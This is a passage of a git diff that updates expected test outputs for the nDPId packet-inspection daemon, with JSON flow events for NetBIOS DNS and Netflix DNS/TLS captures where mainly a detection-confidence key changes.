-00799{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"netbios_wildcard_dns_query.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597866040493,"flow_last_seen":1597866040493,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1597866040493,"l3_proto":"ip4","src_ip":"10.1.67.250","dst_ip":"10.1.66.20","src_port":41335,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ckaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00799{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"netbios_wildcard_dns_query.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597866040493,"flow_last_seen":1597866040493,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1597866040493,"l3_proto":"ip4","src_ip":"10.1.67.250","dst_ip":"10.1.66.20","src_port":41335,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ckaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"netbios_wildcard_dns_query.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597866040493,"flow_last_seen":1597866040493,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1597866040493,"l3_proto":"ip4","src_ip":"10.1.67.250","dst_ip":"10.1.66.20","src_port":41335,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00569{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"netbios_wildcard_dns_query.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":1,"total-skipped-flows":0,"total-l4-payload-len":50,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":7,"global_ts_msec":1597866040493} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ @@ -13,9 +13,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869472 bytes -~~ total memory freed........: 5869472 bytes -~~ total allocations/frees...: 118115/118115 +~~ total memory allocated....: 6003106 bytes +~~ total memory freed........: 6003106 bytes +~~ total allocations/frees...: 120877/120877 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 482 chars ~~ json string max len.......: 804 chars diff --git a/test/results/netflix.pcap.out b/test/results/netflix.pcap.out index 962ee4c94..066bc4f57 100644 --- a/test/results/netflix.pcap.out +++ b/test/results/netflix.pcap.out @@ -4,76 +4,76 @@ 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"netflix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1484319030789,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319030789,"pkt":"gCqoTGHM5JjWH70UCABFAAA0e0NAAEAGcrPAqAEHNBhXBs7BAbvkIOdkTYzTZoAREADl8AAAAQEICh9kr+C2r\/ET"} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"netflix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319032865,"flow_last_seen":1484319032865,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1484319032865,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51543,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"netflix.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1484319032865,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"thread_ts_msec":1484319032865,"pkt":"gCqoTGHM5JjWH70UCABFAABCVrgAAEARoJrAqAEHwKgBAclXADUALqX1KVYBAAABAAAAAAAAA2lvcwRuY2NwB25ldGZsaXgDY29tAAABAAE="} -00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"netflix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319032865,"flow_last_seen":1484319032865,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1484319032865,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51543,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ios.nccp.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"netflix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319032865,"flow_last_seen":1484319032865,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1484319032865,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51543,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ios.nccp.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"netflix.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1484319032866,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"thread_ts_msec":1484319032866,"pkt":"gCqoTGHM5JjWH70UCABFAABC8wcAAEARBEvAqAEHwKgBAclXADUALjTPmmEBAAABAAAAAAAAA2lvcwRuY2NwB25ldGZsaXgDY29tAAAcAAE="} -00776{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3,"source":"netflix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319032865,"flow_last_seen":1484319032866,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1484319032866,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51543,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ios.nccp.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00776{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3,"source":"netflix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319032865,"flow_last_seen":1484319032866,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1484319032866,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51543,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ios.nccp.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00747{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"netflix.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1484319032879,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1484319032879,"pkt":"5JjWH70UgCqoTGHMCABFAAEF4UBAAEAR1U7AqAEBwKgBBwA1yVcA8QwWKVaBgAABAAoAAAAAA2lvcwRuY2NwB25ldGZsaXgDY29tAAABAAHADAAFAAEAAABvAA8DaW9zBG5jY3ADZ2VvwBXAMgAFAAEAAAFrABwDaW9zBG5jY3AJdXMtd2VzdC0yBnByb2RhYcAVwE0AAQABAAAAMgAENr8RM8BNAAEAAQAAADIABDa\/+KzATQABAAEAAAAyAAQ2ummQwE0AAQABAAAAMgAENroXx8BNAAEAAQAAADIABDaVT4rATQABAAEAAAAyAAQ2uopvwE0AAQABAAAAMgAENshkTsBNAAEAAQAAADIABDa6J1c="} -00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"netflix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1484319032865,"flow_last_seen":1484319032879,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1484319032879,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51543,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ios.nccp.netflix.com","num_queries":1,"num_answers":10,"reply_code":0,"query_type":28,"rsp_type":1,"rsp_addr":"54.191.17.51"}} +00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"netflix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1484319032865,"flow_last_seen":1484319032879,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1484319032879,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51543,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ios.nccp.netflix.com","num_queries":1,"num_answers":10,"reply_code":0,"query_type":28,"rsp_type":1,"rsp_addr":"54.191.17.51"}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"netflix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319032882,"flow_last_seen":1484319032882,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1484319032882,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52116,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"netflix.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1484319032882,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":96,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":96,"pkt_l4_len":62,"thread_ts_msec":1484319032882,"pkt":"gCqoTGHM5JjWH70UCABFAABSBKEAAP8RM6HAqAEHwKgBAcuUADUAPjWQ0IgBAAABAAAAAAAAB2ljaG5hZWEJdXMtd2VzdC0yBnByb2RhYQduZXRmbGl4A2NvbQAAAQAB"} -00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"netflix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319032882,"flow_last_seen":1484319032882,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1484319032882,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52116,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ichnaea.us-west-2.prodaa.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"netflix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319032882,"flow_last_seen":1484319032882,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1484319032882,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52116,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ichnaea.us-west-2.prodaa.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"netflix.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1484319032884,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":1484319032884,"pkt":"5JjWH70UgCqoTGHMCABFAADS4UJAAEAR1X\/AqAEBwKgBBwA1y5QAvmn70IiBgAABAAgAAAAAB2ljaG5hZWEJdXMtd2VzdC0yBnByb2RhYQduZXRmbGl4A2NvbQAAAQABwAwAAQABAAAAAQAENkXM8cAMAAEAAQAAAAEABDQqmRbADAABAAEAAAABAAQ2RDCIwAwAAQABAAAAAQAENkQSPsAMAAEAAQAAAAEABDZGuZ3ADAABAAEAAAABAAQ0IoVtwAwAAQABAAAAAQAENpVZIsAMAAEAAQAAAAEABDaUWeg="} -00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"netflix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319032882,"flow_last_seen":1484319032884,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":236,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1484319032884,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52116,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ichnaea.us-west-2.prodaa.netflix.com","num_queries":1,"num_answers":8,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.69.204.241"}} +00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"netflix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319032882,"flow_last_seen":1484319032884,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":236,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1484319032884,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52116,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ichnaea.us-west-2.prodaa.netflix.com","num_queries":1,"num_answers":8,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.69.204.241"}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319032888,"flow_last_seen":1484319032888,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319032888,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53105,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1484319032888,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319032888,"pkt":"gCqoTGHM5JjWH70UCABFAABA+AxAAEAGfcXAqAEHNkXM8c9xAbuJGKiDAAAAALAC\/\/+XvgAAAgQFtAEDAwUBAQgKH2S4KwAAAAAEAgAA"} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319032896,"flow_last_seen":1484319032896,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319032896,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53114,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1484319032896,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319032896,"pkt":"gCqoTGHM5JjWH70UCABFAABADepAAEAGIy3AqAEHNr8RM896Abu7NDMxAAAAALAC\/\/+WKQAAAgQFtAEDAwUBAQgKH2S4MgAAAAAEAgAA"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1484319032934,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319032934,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGjLY2RczxwKgBBwG7z3E0MsEbiRiohKASReqX9AAAAgQFtAQCCAqFp0\/bH2S4KwEDAwg="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1484319032937,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319032937,"pkt":"gCqoTGHM5JjWH70UCABFAAA0mxZAAEAG2sfAqAEHNkXM8c9xAbuJGKiENDLBHIAQEBX8aAAAAQEICh9kuFmFp0\/b"} -00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319032888,"flow_last_seen":1484319032938,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1484319032938,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53105,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"spdy\/3.1,spdy\/3,http\/1.1"}} +00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319032888,"flow_last_seen":1484319032938,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1484319032938,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53105,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"spdy\/3.1,spdy\/3,http\/1.1"}} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1484319032943,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319032943,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGR\/s2vxEzwKgBBwG7z3pSqS+duzQzMqASOJAFFAAAAgQFtAQCCAqtijmlH2S4MgEDAwg="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1484319032944,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319032944,"pkt":"gCqoTGHM5JjWH70UCABFAAA0cYhAAEAGv5rAqAEHNr8RM896Abu7NDMyUqkvnoAQEBVcLgAAAQEICh9kuGCtijml"} -00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319032896,"flow_last_seen":1484319032959,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1484319032959,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53114,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319032896,"flow_last_seen":1484319032959,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1484319032959,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53114,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319032984,"flow_last_seen":1484319032984,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319032984,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53115,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1484319032984,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319032984,"pkt":"gCqoTGHM5JjWH70UCABFAABAh8JAAEAG+QHAqAEHNCDEJM97AbvHy0puAAAAALAC\/\/\/BrQAAAgQFtAEDAwUBAQgKH2S4hgAAAAAEAgAA"} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319032986,"flow_last_seen":1484319032986,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319032986,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53116,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1484319032986,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319032986,"pkt":"gCqoTGHM5JjWH70UCABFAABAdf5AAEAGCsbAqAEHNCDEJM98AbvweU0rAAAAALAC\/\/+WPwAAAgQFtAEDAwUBAQgKH2S4iAAAAAAEAgAA"} 